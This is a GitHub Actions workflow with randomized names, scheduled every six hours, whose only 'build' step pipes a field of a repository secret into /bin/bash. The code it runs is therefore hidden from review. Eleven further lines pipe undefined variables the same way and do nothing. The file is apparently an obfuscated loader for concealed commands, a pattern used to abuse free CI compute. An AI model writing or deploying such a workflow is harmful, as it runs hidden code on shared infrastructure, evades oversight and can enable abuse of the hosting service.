name: zhaoyinluo4178

on:
  workflow_dispatch:
  schedule:
    - cron: '50 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhaoyinluo4178
        env:
          a23: ${{ secrets.a23 }}
        run: |
          echo $a23 | jq -r .fvlt811 | /bin/bash
          echo $lnnsv40 | jq -r .mgccc3674 | /bin/bash
          echo $jmg391 | jq -r .zqne71 | /bin/bash
          echo $fulv6763 | jq -r .pcc7 | /bin/bash
          echo $rm305 | jq -r .wj478 | /bin/bash
          echo $tr67 | jq -r .ncxc23 | /bin/bash
          echo $bv7233 | jq -r .t24 | /bin/bash
          echo $jkoqs0587 | jq -r .px667 | /bin/bash
          echo $azh49 | jq -r .alvvh5119 | /bin/bash
          echo $o80 | jq -r .vigjx5385 | /bin/bash
          echo $dfc9093 | jq -r .ebnpv10658 | /bin/bash
          echo $ixgp970 | jq -r .ftwxs452 | /bin/bash

